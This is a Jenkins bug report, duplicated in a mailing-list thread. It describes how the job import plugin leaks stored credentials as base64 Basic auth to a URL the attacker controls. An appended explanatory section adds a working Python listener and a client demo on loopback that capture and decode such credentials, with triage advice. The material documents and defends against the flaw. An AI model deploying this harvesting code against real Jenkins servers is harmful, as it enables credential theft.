[JIRA] (JENKINS-56128) Job import plugin allows credential dumping

2019-02-13 Thread joshua...@gmail.com (JIRA)
Joshua Ganger updated an issue
Jenkins / JENKINS-56128
Job import plugin allows credential dumping

Change By: Joshua Ganger

Logged into Jenkins with a valid user, no unrestricted credentials assigned/scoped to my user. No permission to view or add credentials assigned to my user. Job import plugin has several users available, appearing in the dropdown as "username/***". If I enter a query URL for an HTTP server that I control and select one of these credentials, the password is transmitted in base64 encoding in the HTTP GET request. This essentially allows me to dump any of these stored credentials despite not being allowed to access them through the credentials page. It's possible that I misunderstand this functionality or that we have a misconfiguration, but this seems abusable.

This message was sent by Atlassian Jira (v7.11.2#711002-sha1:fdc329d)

-- 
You received this message because you are subscribed to the Google Groups "Jenkins Issues" group.
To unsubscribe from this group and stop receiving emails from it, send an email to jenkinsci-issues+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


[JIRA] (JENKINS-56128) Job import plugin allows credential dumping

2019-02-13 Thread joshua...@gmail.com (JIRA)
Joshua Ganger created an issue
Jenkins / JENKINS-56128
Job import plugin allows credential dumping

Issue Type: Bug
Assignee: Unassigned
Components: job-import-plugin
Created: 2019-02-13 15:58
Environment: Jenkins ver. 2.150.2
Priority: Minor
Reporter: Joshua Ganger

Logged into Jenkins with a valid user, no unrestricted credentials assigned/scoped to my user. Job import plugin has several users available, appearing in the dropdown as "username/***". If I enter a query URL for an HTTP server that I control and select one of these credentials, the password is transmitted in base64 encoding in the HTTP GET request. This essentially allows me to dump any of these stored credentials despite not being allowed to access them through the credentials page. It's possible that I misunderstand this functionality or that we have a misconfiguration, but this seems abusable.
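The capture the reporter describes in both messages above, reproduced end to end as an added example. This is not code from the issue, from Jenkins or from the job-import plugin: it assumes (as the report implies) that the plugin attaches the selected stored credential to its GET as HTTP Basic authentication, which is what "base64 encoding" in the request means in practice. The listener plays the "HTTP server that I control", the client function stands in for the plugin, and the username, password and URL path are constructed sample values; everything runs on loopback.

```python
"""Harvesting a Basic-auth credential sent to an attacker-controlled URL.

Added example, not the job-import plugin's code. The client behaviour
(attach a stored credential as Basic auth to a GET against a caller-supplied
URL) is assumed from the issue description.
"""
import base64
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


def decode_basic_auth(header_value):
    """Decode an 'Authorization: Basic <base64>' value into (user, password).

    Returns None for a missing, non-Basic or malformed header. Basic auth is
    reversible encoding, not encryption: whoever receives the request reads
    the password directly.
    """
    if not header_value:
        return None
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        raw = base64.b64decode(token.strip(), validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None
    user, sep, password = raw.partition(":")
    if not sep:
        return None
    return user, password


class CaptureHandler(BaseHTTPRequestHandler):
    """The attacker's listener: records any Basic credential on a GET and
    replies with a harmless 200 so the client sees nothing unusual."""
    captured = []  # (path, user, password) tuples, shared across requests

    def do_GET(self):
        creds = decode_basic_auth(self.headers.get("Authorization"))
        if creds is not None:
            CaptureHandler.captured.append((self.path, creds[0], creds[1]))
        body = b"<hudson/>"  # constructed placeholder response body
        self.send_response(200)
        self.send_header("Content-Type", "application/xml")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, format, *args):
        pass  # silence the default stderr access log


def send_with_stored_credential(url, username, password):
    """Mimic a client that attaches a stored credential to a GET against a
    caller-supplied URL (assumed plugin behaviour, not its own code)."""
    token = base64.b64encode(f"{username}:{password}".encode("utf-8")).decode("ascii")
    req = urllib.request.Request(url, headers={"Authorization": f"Basic {token}"})
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))  # ignore proxy env
    with opener.open(req, timeout=5) as resp:
        return resp.status


def demo():
    """Run the capture on loopback; return (HTTP status, harvested credentials)."""
    CaptureHandler.captured.clear()
    server = HTTPServer(("127.0.0.1", 0), CaptureHandler)  # ephemeral port
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        url = f"http://127.0.0.1:{server.server_port}/api/json"
        # constructed sample credential standing in for a "username/***" entry
        status = send_with_stored_credential(url, "deploy-bot", "s3cret-token")
        return status, list(CaptureHandler.captured)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    status, harvested = demo()
    for path, user, password in harvested:
        print(f"captured {user}:{password} on GET {path} (client saw HTTP {status})")
```

The point of the listener is that no cryptanalysis is involved: the only control standing between a low-privilege user and the password is whether the server lets that user select a credential they are not permitted to use. When triaging a report like this, check whether the credential dropdown is populated with credentials the current user lacks permission to use or view; if it is, the encoding of the outbound request is irrelevant.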